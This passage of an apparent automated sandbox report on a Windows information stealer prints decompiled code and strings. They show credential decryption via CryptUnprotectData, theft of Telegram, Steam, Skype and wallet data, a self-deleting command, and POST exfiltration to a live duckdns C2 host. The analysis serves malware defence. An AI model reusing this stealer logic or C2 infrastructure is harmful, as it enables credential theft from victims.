                                                                                                                                                                                              			}

                                                                                                                                                                                              0x00419abc
                                                                                                                                                                                              0x00419acd
                                                                                                                                                                                              0x00419ade
                                                                                                                                                                                              0x00419ae3
                                                                                                                                                                                              0x00419ae9
                                                                                                                                                                                              0x00419af4
                                                                                                                                                                                              0x00419afb
                                                                                                                                                                                              0x00419b0c
                                                                                                                                                                                              0x00419b1d
                                                                                                                                                                                              0x00419b22
                                                                                                                                                                                              0x00419b28
                                                                                                                                                                                              0x00419b33
                                                                                                                                                                                              0x00419b3a
                                                                                                                                                                                              0x00419b4b
                                                                                                                                                                                              0x00419b5c
                                                                                                                                                                                              0x00419b61
                                                                                                                                                                                              0x00419b67
                                                                                                                                                                                              0x00419b75
                                                                                                                                                                                              0x00419b7a
                                                                                                                                                                                              0x00419b80
                                                                                                                                                                                              0x00419b8b
                                                                                                                                                                                              0x00419b9c
                                                                                                                                                                                              0x00419ba1
                                                                                                                                                                                              0x00419baf
                                                                                                                                                                                              0x00419bb4
                                                                                                                                                                                              0x00419bb9
                                                                                                                                                                                              0x00419bc1
                                                                                                                                                                                              0x00419bcb
                                                                                                                                                                                              0x00419bce
                                                                                                                                                                                              0x00419bd3
                                                                                                                                                                                              0x00419bdb
                                                                                                                                                                                              0x00419be0
                                                                                                                                                                                              0x00419be6
                                                                                                                                                                                              0x00419beb
                                                                                                                                                                                              0x00419bf3
                                                                                                                                                                                              0x00419bf8
                                                                                                                                                                                              0x00419bfe
                                                                                                                                                                                              0x00419c03
                                                                                                                                                                                              0x00419c0b
                                                                                                                                                                                              0x00419c10
                                                                                                                                                                                              0x00419c16
                                                                                                                                                                                              0x00419c1b
                                                                                                                                                                                              0x00419c25
                                                                                                                                                                                              0x00419c2a
                                                                                                                                                                                              0x00419c2e
                                                                                                                                                                                              0x00419c30
                                                                                                                                                                                              0x00419c33
                                                                                                                                                                                              0x00419c38
                                                                                                                                                                                              0x00419c46
                                                                                                                                                                                              0x00419c54
                                                                                                                                                                                              0x00419c54
                                                                                                                                                                                              0x00419c64
                                                                                                                                                                                              0x00419c70
                                                                                                                                                                                              0x00419c75
                                                                                                                                                                                              0x00419c7a
                                                                                                                                                                                              0x00419c83
                                                                                                                                                                                              0x00419c8a
                                                                                                                                                                                              0x00419c91
                                                                                                                                                                                              0x00419c99
                                                                                                                                                                                              0x00419c9e
                                                                                                                                                                                              0x00419ca1
                                                                                                                                                                                              0x00419db1
                                                                                                                                                                                              0x00419db1
                                                                                                                                                                                              0x00419dbc
                                                                                                                                                                                              0x00419dcc
                                                                                                                                                                                              0x00419dd1
                                                                                                                                                                                              0x00419dec
                                                                                                                                                                                              0x00419df4
                                                                                                                                                                                              0x00419df9
                                                                                                                                                                                              0x00419dff
                                                                                                                                                                                              0x00419e03
                                                                                                                                                                                              0x00419e16
                                                                                                                                                                                              0x00419e1b
                                                                                                                                                                                              0x00419e25
                                                                                                                                                                                              0x00419e31
                                                                                                                                                                                              0x00419e39
                                                                                                                                                                                              0x00419e4a
                                                                                                                                                                                              0x00419e5a
                                                                                                                                                                                              0x00419e6b
                                                                                                                                                                                              0x00419e7e
                                                                                                                                                                                              0x00419e8f
                                                                                                                                                                                              0x00419ea0
                                                                                                                                                                                              0x00419ebb
                                                                                                                                                                                              0x00419ecb
                                                                                                                                                                                              0x00419ed9
                                                                                                                                                                                              0x00419eea
                                                                                                                                                                                              0x00419efb
                                                                                                                                                                                              0x00419f0b
                                                                                                                                                                                              0x00419f11
                                                                                                                                                                                              0x00419f13
                                                                                                                                                                                              0x00419f20
                                                                                                                                                                                              0x00419f27
                                                                                                                                                                                              0x00419f2b
                                                                                                                                                                                              0x00419f2b
                                                                                                                                                                                              0x00419e03
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419df9
                                                                                                                                                                                              0x00419ddb
                                                                                                                                                                                              0x00419de0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419de2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419ca7
                                                                                                                                                                                              0x00419ca7
                                                                                                                                                                                              0x00419cb2
                                                                                                                                                                                              0x00419cc1
                                                                                                                                                                                              0x00419cc4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419cca
                                                                                                                                                                                              0x00419ccb
                                                                                                                                                                                              0x00419ccd
                                                                                                                                                                                              0x00419ccd
                                                                                                                                                                                              0x00419cdd
                                                                                                                                                                                              0x00419ce2
                                                                                                                                                                                              0x00419ce5
                                                                                                                                                                                              0x00419cf3
                                                                                                                                                                                              0x00419d00
                                                                                                                                                                                              0x00419d03
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d13
                                                                                                                                                                                              0x00419d18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d1e
                                                                                                                                                                                              0x00419d2c
                                                                                                                                                                                              0x00419d31
                                                                                                                                                                                              0x00419d3f
                                                                                                                                                                                              0x00419d42
                                                                                                                                                                                              0x00419d85
                                                                                                                                                                                              0x00419d85
                                                                                                                                                                                              0x00419d89
                                                                                                                                                                                              0x00419d96
                                                                                                                                                                                              0x00419da4
                                                                                                                                                                                              0x00419da4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00419d89
                                                                                                                                                                                              0x00419d44
                                                                                                                                                                                              0x00419692
                                                                                                                                                                                              0x004196a6
                                                                                                                                                                                              0x004196b2
                                                                                                                                                                                              0x004196b7
                                                                                                                                                                                              0x004196b7
                                                                                                                                                                                              0x004196ba
                                                                                                                                                                                              0x004196bb
                                                                                                                                                                                              0x004196cb
                                                                                                                                                                                              0x004196dc
                                                                                                                                                                                              0x004196e7
                                                                                                                                                                                              0x004196f4
                                                                                                                                                                                              0x004196ff
                                                                                                                                                                                              0x0041970e
                                                                                                                                                                                              0x0041971f
                                                                                                                                                                                              0x0041972a
                                                                                                                                                                                              0x0041972b
                                                                                                                                                                                              0x0041972c
                                                                                                                                                                                              0x0041972c
                                                                                                                                                                                              0x00419731
                                                                                                                                                                                              0x00419731
                                                                                                                                                                                              0x00419731
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041973d
                                                                                                                                                                                              0x00419901
                                                                                                                                                                                              0x00419901
                                                                                                                                                                                              0x00419902
                                                                                                                                                                                              0x00419902
                                                                                                                                                                                              0x00419902
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041932a
                                                                                                                                                                                              0x00419321

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00419195
                                                                                                                                                                                                • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                                • Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00419460
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00419468
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00419F2B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
                                                                                                                                                                                              • String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
                                                                                                                                                                                              • API String ID: 447519224-805684967
                                                                                                                                                                                              • Opcode ID: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
                                                                                                                                                                                              • Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                              			E00418688(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                              				_Unknown_base(*)()* _v24;
                                                                                                                                                                                              				_Unknown_base(*)()* _v28;
                                                                                                                                                                                              				_Unknown_base(*)()* _v32;
                                                                                                                                                                                              				_Unknown_base(*)()* _v36;
                                                                                                                                                                                              				_Unknown_base(*)()* _v40;
                                                                                                                                                                                              				_Unknown_base(*)()* _v44;
                                                                                                                                                                                              				_Unknown_base(*)()* _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				void* _v64;
                                                                                                                                                                                              				void* _v68;
                                                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                                                              				char _v73;
                                                                                                                                                                                              				signed int _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				char _v132;
                                                                                                                                                                                              				char _v388;
                                                                                                                                                                                              				char _v516;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v2692;
                                                                                                                                                                                              				char _v3716;
                                                                                                                                                                                              				char _v3776;
                                                                                                                                                                                              				char _v69412;
                                                                                                                                                                                              				char _v69416;
                                                                                                                                                                                              				char _v69420;
                                                                                                                                                                                              				char _v69424;
                                                                                                                                                                                              				char _v69428;
                                                                                                                                                                                              				char _v69432;
                                                                                                                                                                                              				char _v69436;
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				long _t223;
                                                                                                                                                                                              				long _t284;
                                                                                                                                                                                              				void* _t298;
                                                                                                                                                                                              				struct HINSTANCE__* _t321;
                                                                                                                                                                                              				struct HINSTANCE__* _t325;
                                                                                                                                                                                              				void* _t326;
                                                                                                                                                                                              				intOrPtr _t328;
                                                                                                                                                                                              				intOrPtr _t351;
                                                                                                                                                                                              				void* _t358;
                                                                                                                                                                                              				struct _SYSTEMTIME _t369;
                                                                                                                                                                                              				intOrPtr* _t371;
                                                                                                                                                                                              				intOrPtr _t373;
                                                                                                                                                                                              				intOrPtr _t374;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t373 = _t374;
                                                                                                                                                                                              				_t328 = 0x21e6;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t328 = _t328 - 1;
                                                                                                                                                                                              				} while (_t328 != 0);
                                                                                                                                                                                              				_push(_t328);
                                                                                                                                                                                              				_t1 =  &_v8;
                                                                                                                                                                                              				 *_t1 = _t328;
                                                                                                                                                                                              				_v16 =  *_t1;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				E00403980(_v12);
                                                                                                                                                                                              				E00403980(_v16);
                                                                                                                                                                                              				_t369 =  &_v3776;
                                                                                                                                                                                              				_push(_t373);
                                                                                                                                                                                              				_push(0x418b80);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t374;
                                                                                                                                                                                              				if(_v16 == 0) {
		E0040357C( &_v16, 0x418b98);
	}
	E004034E4( &_v92);
	E0040357C( &_v56, _v8);
	_v73 = 0;
	E0040357C( &_v52, "wininet.dll");
	_t325 = GetModuleHandleA(E004039E8( &_v52));
	if(_t325 == 0) {
		_t321 = LoadLibraryA(E004039E8( &_v52)); // executed
		_t325 = _t321;
	}
	if(_t325 == 0) {
		(E004039E8( &_v52))[7] = 0;
		_t325 = LoadLibraryA(E004039E8( &_v52));
	}
	_v20 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0xc]));
	_v24 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x1a]));
	_v28 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x2b]));
	_v32 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x3c]));
	_v36 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x53]));
	_v40 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x64]));
	_t371 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x75]));
	_v44 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x89]));
	_v48 = GetProcAddress(_t325,  &((E004039E8( &_v52))[0x9b]));
	E00404F00();
	E00404F00();
	E00404F00();
	E00404F00();
	E00404F00();
	E00404F00();
	E00404F00();
	 *_t369 = 0x3c;
	 *((intOrPtr*)(_t369 + 4)) =  &_v132;
	 *((intOrPtr*)(_t369 + 8)) = 0x20;
	 *(_t369 + 0x10) =  &_v388;
	 *((intOrPtr*)(_t369 + 0x14)) = 0x100;
	 *((intOrPtr*)(_t369 + 0x1c)) =  &_v516;
	 *((intOrPtr*)(_t369 + 0x20)) = 0x80;
	 *((intOrPtr*)(_t369 + 0x24)) =  &_v644;
	 *((intOrPtr*)(_t369 + 0x28)) = 0x80;
	 *(_t369 + 0x2c) =  &_v2692;
	 *((intOrPtr*)(_t369 + 0x30)) = 0x800;
	 *((intOrPtr*)(_t369 + 0x34)) =  &_v3716;
	 *((intOrPtr*)(_t369 + 0x38)) = 0x400;
	_t223 = E00403790(_v56);
	InternetCrackUrlA(E00403990(_v56), _t223, 0x90000000, _t369);
	E004036DC( &_v100,  *(_t369 + 0x10));
	E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
	if(E00403A78(0x418c60, _v69416) != 0) {
		_v73 = 1;
		E004036DC( &_v69420,  *(_t369 + 0x10));
		E004037DC( &_v88, _v69420, "Host: ");
		E00417F6C(_v100, _t325,  &_v69424, _t369, _t371);
		 *(_t369 + 0x10) = E00403990(_v69424);
	}
	_t326 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
	 *(_t369 + 0x10) = 0x41b7c0;
	_v84 = 0x2dc6c0;
	_v48(_t326, 6,  &_v84, 4);
	_v48(_t326, 5,  &_v84, 4);
	_v64 = InternetConnectA(_t326,  *(_t369 + 0x10),  *(_t369 + 0x18), 0, 0, 3, 0, 0);
	if(_v64 != 0) {
		_v80 = 0x84003300;
		E004036DC( &_v69428,  *((intOrPtr*)(_t369 + 4)));
		if(E00403A78(0x418cb4, _v69428) != 0) {
			_v80 = _v80 | 0x00800000;
		}
		_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t369 + 0x2c), 0, 0, 0, _v80, 0);
		if(_v68 != 0) {
			if(_v73 != 0) {
				_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
			}
			_t284 = E00403790(_v12);
			if(HttpSendRequestA(_v68, E00418CB8, 0, E00403990(_v12), _t284) != 0) {
				do {
					E00404F00();
					_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
					E004035D4( &_v96, _v60,  &_v69412);
					_t298 = E00403798( &_v92, _v96);
					asm("sbb eax, eax");
				} while (_t298 + 1 != 0 && _v60 != 0);
			}
		}
		InternetCloseHandle(_v68); // executed
	}
	 *_t371(_v64);
	 *_t371(_t326);
	if(_v92 == 0) {
		_push(_v100);
		_push(_v12);
		_push( *(_t369 + 0x18));
		_push( &_v92);
		E004036DC( &_v69432,  *(_t369 + 0x2c));
		_push(_v69432);
		E004036DC( &_v69436,  *(_t369 + 0x10));
		_pop(_t358); // executed
		E00418124(_v69436, _t326, _v16, _t358, _t371); // executed
	}
	E00403538(_a4, _v92);
	E004034E4( &_v92);
	_pop(_t351);
	 *[fs:eax] = _t351;
	_push(E00418B87);
	E00403508( &_v69436, 6);
	E00403508( &_v100, 4);
	E00403508( &_v56, 2);
	return E00403508( &_v16, 3);
}























































                                                                                                                                                                                              0x004188b1
                                                                                                                                                                                              0x004188b4
                                                                                                                                                                                              0x004188c1
                                                                                                                                                                                              0x004188c4
                                                                                                                                                                                              0x004188d1
                                                                                                                                                                                              0x004188d4
                                                                                                                                                                                              0x004188e4
                                                                                                                                                                                              0x004188f3
                                                                                                                                                                                              0x004188fc
                                                                                                                                                                                              0x0041891d
                                                                                                                                                                                              0x00418934
                                                                                                                                                                                              0x00418936
                                                                                                                                                                                              0x00418943
                                                                                                                                                                                              0x00418956
                                                                                                                                                                                              0x00418964
                                                                                                                                                                                              0x00418974
                                                                                                                                                                                              0x00418974
                                                                                                                                                                                              0x00418987
                                                                                                                                                                                              0x00418989
                                                                                                                                                                                              0x00418991
                                                                                                                                                                                              0x004189a1
                                                                                                                                                                                              0x004189ad
                                                                                                                                                                                              0x004189c7
                                                                                                                                                                                              0x004189ce
                                                                                                                                                                                              0x004189d4
                                                                                                                                                                                              0x004189e4
                                                                                                                                                                                              0x004189fb
                                                                                                                                                                                              0x004189fd
                                                                                                                                                                                              0x004189fd
                                                                                                                                                                                              0x00418a24
                                                                                                                                                                                              0x00418a2b
                                                                                                                                                                                              0x00418a35
                                                                                                                                                                                              0x00418a52
                                                                                                                                                                                              0x00418a52
                                                                                                                                                                                              0x00418a58
                                                                                                                                                                                              0x00418a77
                                                                                                                                                                                              0x00418a79
                                                                                                                                                                                              0x00418a84
                                                                                                                                                                                              0x00418aa0
                                                                                                                                                                                              0x00418aaf
                                                                                                                                                                                              0x00418aba
                                                                                                                                                                                              0x00418ac3
                                                                                                                                                                                              0x00418ac6
                                                                                                                                                                                              0x00418a79
                                                                                                                                                                                              0x00418a77
                                                                                                                                                                                              0x00418ad4
                                                                                                                                                                                              0x00418ad4
                                                                                                                                                                                              0x00418ada
                                                                                                                                                                                              0x00418add
                                                                                                                                                                                              0x00418ae3
                                                                                                                                                                                              0x00418ae8
                                                                                                                                                                                              0x00418aec
                                                                                                                                                                                              0x00418af1
                                                                                                                                                                                              0x00418af5
                                                                                                                                                                                              0x00418aff
                                                                                                                                                                                              0x00418b0a
                                                                                                                                                                                              0x00418b14
                                                                                                                                                                                              0x00418b22
                                                                                                                                                                                              0x00418b23
                                                                                                                                                                                              0x00418b23
                                                                                                                                                                                              0x00418b2e
                                                                                                                                                                                              0x00418b36
                                                                                                                                                                                              0x00418b3d
                                                                                                                                                                                              0x00418b40
                                                                                                                                                                                              0x00418b43
                                                                                                                                                                                              0x00418b53
                                                                                                                                                                                              0x00418b60
                                                                                                                                                                                              0x00418b6d
                                                                                                                                                                                              0x00418b7f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
                                                                                                                                                                                              • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$aca1cab2451.duckdns.org$wininet.dll
                                                                                                                                                                                              • API String ID: 3386017226-128824149
                                                                                                                                                                                              • Opcode ID: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                              • Instruction ID: 8c20cc009bbb13acc87624f3a171753233ac08310759435a2e91fadf7e7a38d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33E1EBB1910218ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B7681DB78AA458B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040955E() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              				struct HINSTANCE__* _t2;
                                                                                                                                                                                              				_Unknown_base(*)()* _t3;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *0x41c7cc =  *0x41c7cc - 1;
                                                                                                                                                                                              				if( *0x41c7cc < 0) {
                                                                                                                                                                                              					_t2 = LoadLibraryA("crypt32.dll"); // executed
                                                                                                                                                                                              					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
                                                                                                                                                                                              					 *0x41c7c8 = _t3;
                                                                                                                                                                                              					return _t3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t1;
                                                                                                                                                                                              			}







                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                              • API String ID: 2574300362-1827663648
                                                                                                                                                                                              • Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                              • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00401870() {
                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(_t23);
                                                                                                                                                                                              				_push(E00401926);
                                                                                                                                                                                              				_push( *[fs:edx]);
                                                                                                                                                                                              				 *[fs:edx] = _t23;
                                                                                                                                                                                              				_push(0x41c5b4);
                                                                                                                                                                                              				L004011C4();
                                                                                                                                                                                              				if( *0x41c035 != 0) {
                                                                                                                                                                                              					_push(0x41c5b4);
                                                                                                                                                                                              					L004011CC();
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00401234(0x41c5d4);
                                                                                                                                                                                              				E00401234(0x41c5e4);
                                                                                                                                                                                              				E00401234(0x41c610);
                                                                                                                                                                                              				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                                                                                                              				 *0x41c60c = _t11;
                                                                                                                                                                                              				if( *0x41c60c != 0) {
                                                                                                                                                                                              					_t13 = 3;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t20 =  *0x41c60c; // 0x0
                                                                                                                                                                                              						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                                                                                              						_t13 = _t13 + 1;
                                                                                                                                                                                              					} while (_t13 != 0x401);
                                                                                                                                                                                              					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
                                                                                                                                                                                              					 *0x41c5f4 = 0x41c5f4;
                                                                                                                                                                                              					 *0x41c600 = 0x41c5f4;
                                                                                                                                                                                              					 *0x41c5ac = 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t19);
                                                                                                                                                                                              				 *[fs:eax] = _t19;
                                                                                                                                                                                              				_push(E0040192D);
                                                                                                                                                                                              				if( *0x41c035 != 0) {
                                                                                                                                                                                              					_push(0x41c5b4);
                                                                                                                                                                                              					L004011D4();
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 730355536-0
                                                                                                                                                                                              • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                              • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 27%
                                                                                                                                                                                              			E00407C58() {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				short _v10;
                                                                                                                                                                                              				char _v14;
                                                                                                                                                                                              				long _v20;
